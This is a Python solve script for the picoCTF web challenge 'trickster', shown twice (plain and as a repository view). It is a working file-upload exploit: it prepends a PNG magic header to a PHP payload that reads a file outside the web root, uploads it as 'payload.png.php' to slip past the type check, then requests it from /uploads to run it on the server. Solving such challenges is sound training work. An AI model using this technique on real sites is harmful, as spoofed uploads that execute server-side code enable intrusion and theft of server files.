picoctf/web/trickster/solve.py

#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3 python3Packages.requests

import requests

BASE_URL = "http://atlas.picoctf.net:65066"

def main():
    PNG_HEADER = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])
    payload =  PNG_HEADER + b'''
    <?php
      echo(file_get_contents("../GQ4DOOBVMMYGK.txt"))
    ?>
    '''

    requests.post(
        BASE_URL + "/",
        files = {
            'file': ('payload.png.php', payload),
            'submit': 'Upload File',
        }
    )

    # Found through /robots.txt
    res = requests.get(BASE_URL + "/uploads/payload.png.php")

    print(res)
    print(res.text)

if __name__ == '__main__':
    main()
web/trickster 2024-09-05 19:54:46 +02:00			`#!/usr/bin/env nix-shell`
			`#!nix-shell -i python3 -p python3 python3Packages.requests`

			`import requests`

			`BASE_URL = "http://atlas.picoctf.net:65066"`

			`def main():`
			`PNG_HEADER = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])`
			`payload = PNG_HEADER + b'''`
			`<?php`
			`echo(file_get_contents("../GQ4DOOBVMMYGK.txt"))`
			`?>`
			`'''`

			`requests.post(`
			`BASE_URL + "/",`
			`files = {`
			`'file': ('payload.png.php', payload),`
			`'submit': 'Upload File',`
			`}`
			`)`

			`# Found through /robots.txt`
			`res = requests.get(BASE_URL + "/uploads/payload.png.php")`

			`print(res)`
			`print(res.text)`

			`if __name__ == '__main__':`
			`main()`